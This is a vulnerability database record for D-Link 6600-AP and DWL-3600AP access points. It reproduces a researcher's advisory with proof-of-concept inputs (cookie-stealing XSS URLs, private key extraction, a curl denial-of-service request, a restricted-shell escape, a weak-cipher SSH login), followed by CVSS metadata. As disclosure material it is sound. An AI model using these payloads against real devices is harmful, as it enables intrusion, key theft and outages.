VAR-201908-0911

Vulnerability from variot - Updated: 2024-11-23 21:52

An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. The D-Link 6600-AP and DWL-3600AP contain an input validation vulnerability that can put the device into a service operation interruption (DoS) state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot.

Security Advisory - 22/07/2019

Multiple vulnerabilities were found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14). The D-Link 6600-AP is no longer produced, but D-Link still provides support for it, as described on the D-Link website. Note that this product is built for D-Link's business customers, so we can expect thousands of devices to be at risk. The code base is shared with the DWL-3600AP and DWL-8610AP.

This advisory was sent to D-Link on 22/05/2019

Many thanks to the D-Link Security Team for their prompt response!

Affected Product

D-Link 6600-AP, DWL-3600AP. Vulnerability number 2 also affects the DWL-8610AP.

Firmware version

4.2.0.14 Revision Ax date: 21/03/2019

Last version available

https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

Product Identifier

WLAN-EAP

Hardware Version

A2

Manufacturer

D-LINK

Product Description

The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point

List of Vulnerabilities

  1. CVE-2019-14338 - Post-authenticated XSS
  2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
  3. CVE-2019-14337 - Escape shell in the restricted command line interface
  4. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)
  5. CVE-2019-14332 - Use of weak ciphers for SSH

1. Post-authenticated XSS

Exploitation: Local

Severity Level: High

CVE ID : CVE-2019-14338

Proof of concept

Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>

Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>

2. Post-authenticated Certificate and RSA Private Key extraction through http command

Exploitation: Local

Severity Level: High

CVE ID : CVE-2019-14334

Proof of concept

http://10.90.90.91/sslcert-get.cgi?

Result of the command: File "mini_httpd.pem" automatically extracted


3. Pre-authenticated Denial of service leading to the reboot of the AP

Exploitation: Local

Severity Level: High

CVE ID: CVE-2019-14333

Proof of concept

kali# curl -X POST 'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

4. Escape shell in the restricted command line interface

Exploitation: Local

Severity Level: High

CVE ID : CVE-2019-14337

Proof of concept

DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet] [-O|--output-document FILE]
        [--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
        [--no-check-certificate] [-U|--user-agent AGENT][-T SEC]  URL

Retrieve files via HTTP or FTP

Options:
        -s      Spider mode - only check file existence
        -c      Continue retrieval of aborted transfer
        -q      Quiet
        -P DIR  Save to DIR (default .)
        -T SEC  Network read timeout is SEC seconds
        -O FILE Save to FILE ('-' for stdout)
        -U STR  Use STR for User-Agent header
        -Y      Use proxy ('on' or 'off')

DLINK-WLAN-AP#

5. Post-authenticated Denial of service leading to the reboot of the AP

Exploitation: Local

Severity Level: High

CVE ID : CVE-2019-14335

Proof of concept

http://10.90.90.91/admin.cgi?action=%s

6. Post-authenticated Dump all the config files

Exploitation: Local

Severity Level: High

CVE ID : CVE-2019-14336

Proof of concept

http://10.90.90.91/admin.cgi?action=

7. Use of weak ciphers

Exploitation: Local

Severity Level: High

CVE ID : CVE-2019-14332

Proof of concept

root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.

DLINK-WLAN-AP# help

Report Timeline

22/05/2019 : This advisory is sent to D-Link - the contents of this Report will be made public within 30 days.

22/06/2019 : Public release of the security advisory to mailing list

Fixes/Updates

ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip

ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip

About me - pwn.sandstorm@gmail.com

Independent EMSecurity Researcher in the field of IoT under the Sun

Always open to hack and share

Greetings - Ack P. Kim and others for the online resources


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201908-0911",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "6600-ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "4.2.0.14"
      },
      {
        "model": "dwl-3600ap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "4.2.0.14"
      },
      {
        "model": "d-link 6600-ap",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "4.2.0.14"
      },
      {
        "model": "dwl-3600ap",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": "4.2.0.14"
      },
      {
        "model": "6600-ap",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dwl-3600ap",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:d-link:6600-ap_firmware",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:d-link:dwl-3600ap_firmware",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sandstorm Security",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "153840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2019-14333",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-14333",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2019-29140",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-146269",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "id": "CVE-2019-14333",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 5.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-14333",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-14333",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-14333",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-29140",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201907-1639",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-146269",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and cause the device to reboot.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-14333"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "db": "PACKETSTORM",
        "id": "153840"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "PACKETSTORM",
        "id": "153840",
        "trust": 3.2
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14333",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-146269",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "PACKETSTORM",
        "id": "153840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "id": "VAR-201908-0911",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146269"
      }
    ],
    "trust": 1.3903846
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      }
    ]
  },
  "last_update_date": "2024-11-23T21:52:00.729000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Security Advisory",
        "trust": 0.8,
        "url": "https://us.dlink.com/en/security-advisory"
      },
      {
        "title": "Security Bulletin",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "title": "Patch for D-Link 6600-AP and DWL-3600AP Denial of Service Vulnerabilities",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchInfo/show/177599"
      },
      {
        "title": "D-Link 6600-AP  and DWL-3600AP Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95748"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.1,
        "url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
      },
      {
        "trust": 1.7,
        "url": "https://us.dlink.com/en/security-advisory"
      },
      {
        "trust": 1.7,
        "url": "https://www.dlink.com/en/security-bulletin"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14333"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
      },
      {
        "trust": 0.1,
        "url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
      },
      {
        "trust": 0.1,
        "url": "http://10.90.90.91/admin.cgi?action=%s"
      },
      {
        "trust": 0.1,
        "url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
      },
      {
        "trust": 0.1,
        "url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
      },
      {
        "trust": 0.1,
        "url": "http://10.90.90.91/sslcert-get.cgi?"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
      },
      {
        "trust": 0.1,
        "url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
      },
      {
        "trust": 0.1,
        "url": "http://10.90.90.91/admin.cgi?action="
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "PACKETSTORM",
        "id": "153840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "db": "PACKETSTORM",
        "id": "153840"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-08-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "date": "2019-08-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "date": "2019-08-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "date": "2019-07-31T19:01:29",
        "db": "PACKETSTORM",
        "id": "153840"
      },
      {
        "date": "2019-07-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      },
      {
        "date": "2019-08-01T13:15:14.023000",
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-08-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-29140"
      },
      {
        "date": "2020-08-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-146269"
      },
      {
        "date": "2019-08-06T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      },
      {
        "date": "2020-08-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      },
      {
        "date": "2024-11-21T04:26:31.713000",
        "db": "NVD",
        "id": "CVE-2019-14333"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link 6600-AP and  DWL-3600AP Vulnerability related to input validation on devices",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-007261"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201907-1639"
      }
    ],
    "trust": 0.6
  }
}

